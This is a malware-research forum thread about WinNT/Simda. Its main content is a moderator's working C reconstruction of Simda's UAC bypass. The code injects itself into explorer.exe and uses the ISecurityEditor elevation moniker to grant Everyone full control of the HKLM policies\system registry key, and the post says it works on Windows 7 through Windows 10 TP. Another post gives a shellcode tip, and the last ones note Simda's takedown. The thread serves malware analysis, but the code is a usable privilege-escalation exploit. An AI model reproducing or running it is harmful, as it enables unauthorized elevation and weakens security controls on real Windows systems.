WinNT/Simda - Page 5 - KernelMode.info

Re: WinNT/Simda

#24947 by EP_X0FF
Wed Jan 14, 2015 3:27 pm

WinNT/Simda ISecurityEditor usage reconstructed code. It will add new dacl entry <Everyone - Full Control> to specified registry key. If you like you can remove CoCreateInstance etc, they not needed as all this crap already initialized in explorer.exe and they are used here only for debugging, also Simda concats new dacl string to existing, because this is simple example, this is ignored. Additionally no registry values touched, so don't worry for your UAC :)

This will work from Windows 7 up to Windows 10 TP 9901. Case closed.

main.c

Code: Select all

#include <windows.h>
#include "inject.h"

ELOAD_PARAMETERS	ElevParams;

DWORD WINAPI ElavatedLoadProc(PELOAD_PARAMETERS elvpar)
{
	HRESULT				r;
	BOOL				cond = FALSE;
	ISecurityEditor		*SecurityEditor1 = NULL;
	BIND_OPTS3			bop;
	LPOLESTR			pps;

	if (elvpar == NULL)
		return (DWORD)E_FAIL;

	r = elvpar->xCoInitialize(NULL);
	if ( r != S_OK )
		return r;

	RtlSecureZeroMemory(&bop, sizeof(bop));

	do {
		r = elvpar->xCoCreateInstance(&elvpar->xCLSID_ShellSecurityEditor, NULL, 
			CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
			&elvpar->xIID_ISecurityEditor, &SecurityEditor1);
		
		if (r != S_OK)
			break;
		
		if (SecurityEditor1 != NULL)
			SecurityEditor1->lpVtbl->Release(SecurityEditor1);

		bop.cbStruct = sizeof(bop);
		bop.dwClassContext = CLSCTX_LOCAL_SERVER;
		r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID_ISecurityEditor, &SecurityEditor1);
		if (r != S_OK)
			break;
		if (SecurityEditor1 == NULL) {
			r = E_FAIL;
			break;
		}

		pps = NULL;
		r = SecurityEditor1->lpVtbl->GetSecurity(
			SecurityEditor1,
			elvpar->szKey,
			SE_REGISTRY_KEY,
			DACL_SECURITY_INFORMATION,
			&pps
		);

		if ((r == S_OK) && (pps != NULL)) {
			elvpar->xOutputDebugStringW(pps);
		}

		r = SecurityEditor1->lpVtbl->SetSecurity(
			SecurityEditor1,
			elvpar->szKey,
			SE_REGISTRY_KEY,
			DACL_SECURITY_INFORMATION,
			elvpar->szNewSDDL
			);

		if (r == S_OK) {
			elvpar->xOutputDebugStringW(elvpar->szNewSDDL);
		}


	} while (cond);

	if (SecurityEditor1 != NULL)
		SecurityEditor1->lpVtbl->Release(SecurityEditor1);

	elvpar->xCoUninitialize();

	return r;
}

HANDLE GetExplorerHandle()
{
	HWND	hTrayWnd = NULL;
	DWORD	dwProcessId = 0;

	hTrayWnd = FindWindowW(L"Shell_TrayWnd", NULL);
	if (hTrayWnd == NULL)
		return NULL;

	GetWindowThreadProcessId(hTrayWnd, &dwProcessId);
	if (dwProcessId == 0)
		return NULL;

	return OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
}

void main()
{
	HANDLE						expl;
	HINSTANCE					selfmodule = GetModuleHandleW(NULL);
	HINSTANCE					hOle32 = LoadLibraryW(L"ole32.dll");
	PIMAGE_DOS_HEADER			pdosh = (PIMAGE_DOS_HEADER)selfmodule;
	PIMAGE_FILE_HEADER			fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
	PIMAGE_OPTIONAL_HEADER		opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
	LPVOID						remotebuffer = NULL, newEp, newDp;
	SIZE_T						wr = 0;
	DWORD						c;
	BOOL						cond = FALSE;

	lstrcpyW(ElevParams.EleMoniker, L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}");
	lstrcpyW(ElevParams.szKey, L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system");
	lstrcpyW(ElevParams.szNewSDDL, L"D:(A;;GA;;;WD)");

	CLSIDFromString(L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}", &ElevParams.xCLSID_ShellSecurityEditor);
	IIDFromString(L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}", &ElevParams.xIID_ISecurityEditor);

	ElevParams.xCoInitialize = (pfnCoInitialize)GetProcAddress(hOle32, "CoInitialize");
	ElevParams.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(hOle32, "CoCreateInstance");
	ElevParams.xCoGetObject = (pfnCoGetObject)GetProcAddress(hOle32, "CoGetObject");
	ElevParams.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(hOle32, "CoUninitialize");
	ElevParams.xOutputDebugStringW = (pfnNOutputDebugStringW)GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "OutputDebugStringW");

	expl = GetExplorerHandle();
	if (expl == NULL)
		return;

	do {
		remotebuffer = VirtualAllocEx(expl, NULL, opth->SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
		if (remotebuffer == NULL)
			break;

		if (!WriteProcessMemory(expl, remotebuffer, selfmodule, opth->SizeOfImage, &wr))
			break;

		newEp = (char *)remotebuffer + ((char *)&ElavatedLoadProc - (char *)selfmodule);
		newDp = (char *)remotebuffer + ((char *)&ElevParams - (char *)selfmodule);

		CreateRemoteThread(expl, NULL, 0, newEp, newDp, 0, &c);
	} while (cond);

	CloseHandle(expl);
	ExitProcess(0);
}

inject.h

Code: Select all

/*

Types for inject

*/

#include <AccCtrl.h>

typedef HRESULT(WINAPI *pfnCoInitialize)(LPVOID pvReserved);
typedef HRESULT(WINAPI *pfnCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID FAR * ppv);
typedef HRESULT(WINAPI *pfnCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv);
typedef void(WINAPI *pfnCoUninitialize)(void);
typedef void (WINAPI *pfnNOutputDebugStringW)(LPCWSTR lpOutputString);

typedef interface ISecurityEditor ISecurityEditor;

typedef struct ISecurityEditorVtbl
{
	BEGIN_INTERFACE

		HRESULT(STDMETHODCALLTYPE *QueryInterface)(
		__RPC__in ISecurityEditor * This,
		/* [in] */ __RPC__in REFIID riid,
		/* [annotation][iid_is][out] */
		_COM_Outptr_  void **ppvObject);

		ULONG(STDMETHODCALLTYPE *AddRef)(
			__RPC__in ISecurityEditor * This);

		ULONG(STDMETHODCALLTYPE *Release)(
			__RPC__in ISecurityEditor * This);

		HRESULT(STDMETHODCALLTYPE *GetSecurity)(
			__RPC__in ISecurityEditor * This,
			_In_ LPCOLESTR ObjectName,
			_In_ SE_OBJECT_TYPE ObjectType,
			_In_ SECURITY_INFORMATION SecurityInfo,
			_Out_opt_ LPCOLESTR * ppSDDLStr);

		HRESULT(STDMETHODCALLTYPE *SetSecurity)(
			__RPC__in ISecurityEditor * This,
			_In_ LPCOLESTR ObjectName,
			_In_ SE_OBJECT_TYPE ObjectType,
			_In_ SECURITY_INFORMATION SecurityInfo,
			_In_ LPCOLESTR pSDDLStr);

	END_INTERFACE
} *PISecurityEditorVtbl;

interface ISecurityEditor
{
	CONST_VTBL struct ISecurityEditorVtbl *lpVtbl;
};

typedef struct _ELOAD_PARAMETERS {
	WCHAR	ObjectName[MAX_PATH*2];
	WCHAR	EleMoniker[MAX_PATH];
	WCHAR   szKey[MAX_PATH];
	WCHAR   szNewSDDL[MAX_PATH];
	//
	IID		xIID_ISecurityEditor;
	CLSID	xCLSID_ShellSecurityEditor;
	//
	pfnCoInitialize					xCoInitialize;
	pfnCoCreateInstance				xCoCreateInstance;
	pfnCoGetObject					xCoGetObject;
	pfnCoUninitialize				xCoUninitialize;
	pfnNOutputDebugStringW			xOutputDebugStringW;
} ELOAD_PARAMETERS, *PELOAD_PARAMETERS;

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: WinNT/Simda

#24953 by rinn
Thu Jan 15, 2015 6:45 am

Hello.

Just to mention - memory allocated for SDDL string after ISecurityEditor->GetSecurity call must be freed with LocalFree when pps variable is no longer needed. So for your usage extend shellcode to include LocalFree and use it.

Best Regards,
-rin

Username

rinn

Posts

91

Joined

Thu Nov 15, 2012 6:14 am

Location

Japan

Re: WinNT/Simda

#25600 by EP_X0FF
Thu Apr 09, 2015 1:01 pm

Seems Simda having troubles now :)

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: WinNT/Simda

#25623 by N3mes1s
Mon Apr 13, 2015 5:45 am

EP_X0FF wrote:Seems Simda having troubles now :)

Microsoft partners with Interpol, industry to disrupt global malware attack affecting more than 770,000 PCs in past six months

http://blogs.technet.com/b/mmpc/archive ... lware.aspx

Username

N3mes1s

Posts

42

Joined

Wed Mar 09, 2011 5:17 pm